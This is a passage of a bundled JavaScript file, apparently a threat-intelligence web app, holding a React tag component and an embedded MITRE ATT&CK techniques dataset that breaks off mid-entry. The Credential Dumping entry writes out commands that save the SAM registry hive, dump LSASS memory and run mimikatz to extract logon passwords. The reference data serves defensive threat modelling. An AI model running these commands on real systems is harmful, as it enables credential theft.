/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_contexts_mitre_attack__ = __webpack_require__(1642);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__TooltipWrapper__ = __webpack_require__(909);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_uuid__ = __webpack_require__(405);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_uuid___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_uuid__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__MitreTagTooltipAndMetadata__ = __webpack_require__(3554);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

// $FlowFixMe: useState available in flow-bin 0.82



var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:components:BaseTag'); // eslint-disable-line no-unused-vars









// Style for Main Components (things you may export)
var StyledRemovableTag = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'BaseTag__StyledRemovableTag',
  componentId: 'lm75sx-0'
})(['display:inline-flex;align-items:center;min-width:45px;height:', ';font-size:', ';border-radius:3px;margin-right:5px;margin-bottom:5px;background:', ';color:', ';flex-shrink:0;', ''], function (_ref) {
  var small = _ref.small;
  return small ? '1.5rem' : '2rem';
}, function (_ref2) {
  var small = _ref2.small;
  return small ? '0.75rem' : '1rem';
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.LIGHT.hex;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.DARK.hex;
}, function (_ref5) {
  var isMitre = _ref5.isMitre;
  return isMitre && '\n    background: #FACCBB;\n    && > button:hover {\n      background: #FACCBB;\n    }\n  ';
});

var StyledTagLabel = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].span.withConfig({
  displayName: 'BaseTag__StyledTagLabel',
  componentId: 'lm75sx-1'
})(['white-space:nowrap;display:block;pointer-events:none;padding:0 0.5rem;']);

// For some reason, IconButtonPure is not allowing itself to be styled in this context.
// https://github.com/styled-components/styled-components/issues/1449#issuecomment-420087359
var StyledCloseButton = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(function (props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5_trustar_2_0_components_Button__["e" /* IconButtonPure */], props);
}).withConfig({
  displayName: 'BaseTag__StyledCloseButton',
  componentId: 'lm75sx-2'
})(['&&{display:flex;text-align:center;border-radius:0;padding:0 !important;border:0;height:100%;border-right:1px solid ', ';color:', ';:hover{background:initial;opacity:0.8;border-right:1px solid ', ';border-top-left-radius:3px;border-bottom-left-radius:3px;}i{padding:0.45rem;font-size:', ';}}'], function (_ref6) {
  var theme = _ref6.theme;
  return theme.ThemeColors.DARK.hex;
}, function (_ref7) {
  var theme = _ref7.theme;
  return theme.ThemeColors.DARK.hex;
}, function (_ref8) {
  var theme = _ref8.theme;
  return theme.ThemeColors.DARK.hex;
}, function (_ref9) {
  var small = _ref9.small;
  return small ? '.75rem' : '1rem';
});

var initialValues = {
  small: false,
  tagLabel: '',
  maxTagLength: 32
};

// Bindings


var BaseTag = function BaseTag(_ref10) {
  var _ref10$tagLabel = _ref10.tagLabel,
      tagLabel = _ref10$tagLabel === undefined ? '' : _ref10$tagLabel,
      _ref10$small = _ref10.small,
      small = _ref10$small === undefined ? false : _ref10$small,
      _ref10$isRemovable = _ref10.isRemovable,
      isRemovable = _ref10$isRemovable === undefined ? false : _ref10$isRemovable,
      _ref10$maxTagLength = _ref10.maxTagLength,
      maxTagLength = _ref10$maxTagLength === undefined ? 32 : _ref10$maxTagLength,
      _ref10$preventTooltip = _ref10.preventTooltip,
      preventTooltip = _ref10$preventTooltip === undefined ? false : _ref10$preventTooltip,
      onRemove = _ref10.onRemove,
      onClick = _ref10.onClick,
      enclave = _ref10.enclave,
      key = _ref10.key,
      otherProps = _objectWithoutProperties(_ref10, ['tagLabel', 'small', 'isRemovable', 'maxTagLength', 'preventTooltip', 'onRemove', 'onClick', 'enclave', 'key']);

  // $FlowFixMe: useContext isn't in this flow def.
  var mitreAttackThreatModel = __WEBPACK_IMPORTED_MODULE_0_react___default.a.useContext(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_contexts_mitre_attack__["a" /* MitreAttackThreatModelContext */]);

  var _useState = Object(__WEBPACK_IMPORTED_MODULE_0_react__["useState"])(Object(__WEBPACK_IMPORTED_MODULE_9_uuid__["v4"])()),
      _useState2 = _slicedToArray(_useState, 1),
      tagId = _useState2[0];

  var maxLengthString = function maxLengthString(tagLabel) {
    return tagLabel.length > maxTagLength ? tagLabel.substring(0, maxTagLength) + '...' : tagLabel;
  };

  var mitreTagMap = __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_contexts_mitre_attack__["b" /* getters */].getTagMap(mitreAttackThreatModel);
  var mitreInfoIfExists = mitreTagMap.get(tagLabel);
  var relevantTooltip = mitreInfoIfExists ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_10__MitreTagTooltipAndMetadata__["a" /* MitreInfoTagTooltip */],
    { mitreTagInfo: mitreInfoIfExists },
    tagLabel
  ) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    TagTooltip,
    { mitreInfoIfExists: mitreInfoIfExists, enclave: enclave },
    tagLabel
  );

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_8__TooltipWrapper__["b" /* TooltipWrapper */],
    {
      key: key || tagId,
      placement: 'top',
      id: tagId,
      autohide: false,
      preventOpen: preventTooltip,
      tooltip: relevantTooltip },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      StyledRemovableTag,
      _extends({ small: small, isMitre: mitreInfoIfExists }, otherProps),
      isRemovable && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledCloseButton, {
        small: small,
        fill: 'none',
        size: 'small',
        onClick: onRemove,
        icon: __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["s" /* IconLookup */].CROSS
      }),
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledTagLabel,
        {
          title: tagLabel,
          maxTagLength: maxTagLength,
          onClick: onClick },
        maxLengthString(tagLabel)
      )
    )
  );
};

var StyledTooltip = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].span.withConfig({
  displayName: 'BaseTag__StyledTooltip',
  componentId: 'lm75sx-3'
})(['display:inline-block;background-color:', ';color:', ';border:1px solid ', ';padding:', ';'], function (_ref11) {
  var theme = _ref11.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref12) {
  var theme = _ref12.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref13) {
  var theme = _ref13.theme;
  return theme.ThemeColors.BORDER.hex;
}, function (_ref14) {
  var noPadding = _ref14.noPadding;
  return noPadding ? 0 : '0.5rem';
});

var TagTooltip = function TagTooltip(_ref15) {
  var enclave = _ref15.enclave,
      children = _ref15.children,
      otherProps = _objectWithoutProperties(_ref15, ['enclave', 'children']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledTooltip,
    otherProps,
    enclave && enclave.get('name', '') + ': ',
    children
  );
};



/***/ }),
/* 3552 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return MitreAttackThreatModelContext; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__mitre_attack_tactics_techniques_json__ = __webpack_require__(3553);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__mitre_attack_tactics_techniques_json___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__mitre_attack_tactics_techniques_json__);




// $FlowFixMe: need to upgrade flow defs
var MitreAttackThreatModelContext = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createContext(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(__WEBPACK_IMPORTED_MODULE_2__mitre_attack_tactics_techniques_json___default.a));



/***/ }),
/* 3553 */
/***/ (function(module, exports) {

module.exports = {"items":[{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Initial Access","description":"The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.","key":"initial-access","externalId":"TA0001","externalUrl":"https://attack.mitre.org/tactics/TA0001"},"key":"mitre/initial-access"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Execution","description":"The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. ","key":"execution","externalId":"TA0002","externalUrl":"https://attack.mitre.org/tactics/TA0002"},"key":"mitre/execution"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Persistence","description":"The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. ","key":"persistence","externalId":"TA0003","externalUrl":"https://attack.mitre.org/tactics/TA0003"},"key":"mitre/persistence"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Privilege Escalation","description":"The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n•\tSYSTEM/root level\n•\tlocal administrator\n•\tuser account with admin-like access \n•\tuser accounts with access to specific system or perform specific function\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  ","key":"privilege-escalation","externalId":"TA0004","externalUrl":"https://attack.mitre.org/tactics/TA0004"},"key":"mitre/privilege-escalation"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Defense Evasion","description":"The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. ","key":"defense-evasion","externalId":"TA0005","externalUrl":"https://attack.mitre.org/tactics/TA0005"},"key":"mitre/defense-evasion"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Credential Access","description":"The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.","key":"credential-access","externalId":"TA0006","externalUrl":"https://attack.mitre.org/tactics/TA0006"},"key":"mitre/credential-access"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Discovery","description":"The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. ","key":"discovery","externalId":"TA0007","externalUrl":"https://attack.mitre.org/tactics/TA0007"},"key":"mitre/discovery"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Lateral Movement","description":"The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. ","key":"lateral-movement","externalId":"TA0008","externalUrl":"https://attack.mitre.org/tactics/TA0008"},"key":"mitre/lateral-movement"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Collection","description":"The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.","key":"collection","externalId":"TA0009","externalUrl":"https://attack.mitre.org/tactics/TA0009"},"key":"mitre/collection"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Exfiltration","description":"The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.","key":"exfiltration","externalId":"TA0010","externalUrl":"https://attack.mitre.org/tactics/TA0010"},"key":"mitre/exfiltration"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Command and Control","description":"The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.","key":"command-and-control","externalId":"TA0011","externalUrl":"https://attack.mitre.org/tactics/TA0011"},"key":"mitre/command-and-control"},{"type":"mitre","subtype":"tactic","metadata":{"tactic":"Impact","description":"The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n \nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.","key":"impact","externalId":"TA0040","externalUrl":"https://attack.mitre.org/tactics/TA0040"},"key":"mitre/impact"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Indicator Removal from Tools","version":"1.0","description":"If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.","tactics":["defense-evasion"],"externalId":"T1066","externalUrl":"https://attack.mitre.org/techniques/T1066"},"key":"mitre/indicator-removal-from-tools"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Windows Management Instrumentation","version":"1.0","description":"Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)","tactics":["execution"],"externalId":"T1047","externalUrl":"https://attack.mitre.org/techniques/T1047"},"key":"mitre/windows-management-instrumentation"},{"type":"mitre","subtype":"technique","metadata":{"technique":".bash_profile and .bashrc","version":"1.0","description":"~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed.\n\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\n\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell  (Citation: amnesia malware).","tactics":["persistence"],"externalId":"T1156","externalUrl":"https://attack.mitre.org/techniques/T1156"},"key":"mitre/bash-profile-and-bashrc"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Screen Capture","version":"1.0","description":"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.\n\n### Mac\n\nOn OSX, the native command screencapture is used to capture screenshots.\n\n### Linux\n\nOn Linux, there is the native command xwd. (Citation: Antiquated Mac Malware)","tactics":["collection"],"externalId":"T1113","externalUrl":"https://attack.mitre.org/techniques/T1113"},"key":"mitre/screen-capture"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Bootkit","version":"1.0","description":"A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)\n\nAdversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\n### Master Boot Record\nThe MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\n### Volume Boot Record\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.","tactics":["persistence"],"externalId":"T1067","externalUrl":"https://attack.mitre.org/techniques/T1067"},"key":"mitre/bootkit"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Logon Scripts","version":"1.0","description":"### Windows\n\nWindows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.\n\nIf adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.\n\n### Mac\n\nMac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.","tactics":["lateral-movement","persistence"],"externalId":"T1037","externalUrl":"https://attack.mitre.org/techniques/T1037"},"key":"mitre/logon-scripts"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Owner/User Discovery","version":"1.0","description":"### Windows\n\nAdversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.\n\n### Mac\n\nOn Mac, the currently logged in user can be identified with users,w, and who.\n\n### Linux\n\nOn Linux, the currently logged in user can be identified with w and who.","tactics":["discovery"],"externalId":"T1033","externalUrl":"https://attack.mitre.org/techniques/T1033"},"key":"mitre/system-owner-user-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Hidden Window","version":"1.0","description":"The configurations for how applications run on macOS and OS X are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window  (Citation: Antiquated Mac Malware).","tactics":["defense-evasion"],"externalId":"T1143","externalUrl":"https://attack.mitre.org/techniques/T1143"},"key":"mitre/hidden-window"},{"type":"mitre","subtype":"technique","metadata":{"technique":"LC_LOAD_DYLIB Addition","version":"1.0","description":"Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).","tactics":["persistence"],"externalId":"T1161","externalUrl":"https://attack.mitre.org/techniques/T1161"},"key":"mitre/lc-load-dylib-addition"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Plist Modification","version":"1.0","description":"Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)","tactics":["defense-evasion","persistence","privilege-escalation"],"externalId":"T1150","externalUrl":"https://attack.mitre.org/techniques/T1150"},"key":"mitre/plist-modification"},{"type":"mitre","subtype":"technique","metadata":{"technique":"HISTCONTROL","version":"1.0","description":"The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.","tactics":["defense-evasion"],"externalId":"T1148","externalUrl":"https://attack.mitre.org/techniques/T1148"},"key":"mitre/histcontrol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Credential Dumping","version":"1.0","description":"Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n \nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: \"post/windows/gather/credentials/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir /s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https://attack.mitre.org/techniques/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)\n \nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https://attack.mitre.org/software/S0005)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the 